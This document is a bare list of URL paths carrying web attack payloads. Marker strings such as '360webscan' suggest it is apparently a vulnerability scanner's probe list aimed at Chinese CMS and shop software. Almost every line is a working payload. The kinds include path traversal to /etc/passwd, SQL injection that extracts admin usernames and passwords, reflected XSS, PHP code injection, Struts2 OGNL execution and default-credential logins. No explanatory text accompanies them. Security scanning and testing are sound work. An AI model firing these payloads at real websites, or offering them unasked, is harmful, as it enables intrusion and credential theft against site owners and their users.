/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/etc/passwd
/etc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/?search=just_test_not_find_href
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/$
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/solr/dev/admin/
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/level/15/exec/-/show/running-config/CR
/plugins/weathermap/weathermap-cacti-plugin.php
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/.../.../.../.../.../.../.../.../etc/passwd
/
/icons/index
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/icons/small/index
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/
/%3Cscript%3Ealert(42873).do
/
/%3Cscript%20s%3Ealert(42873)
/
/
/?%22onmouseover='prompt(42873)'bad=%22%3E
/%22%3E%3CsCrIpT%3Eprompt(42873)
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/
/'IHLD
/
/
/
/install.php
/
/
/install/index.php
/fckeditor/editor/dialog/fck_about.html
/
/extras/curltest.php?url=file://curltest.php
/
/.svn/entries
/
/
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/plus/carbuyaction.php
/plus/carbuyaction.php?dopost=return&code=../../index
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/yp/product.php?q=&action=searchlist&where=%23
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/user/reg3.php
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/js/calendar.php?lang=../js
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
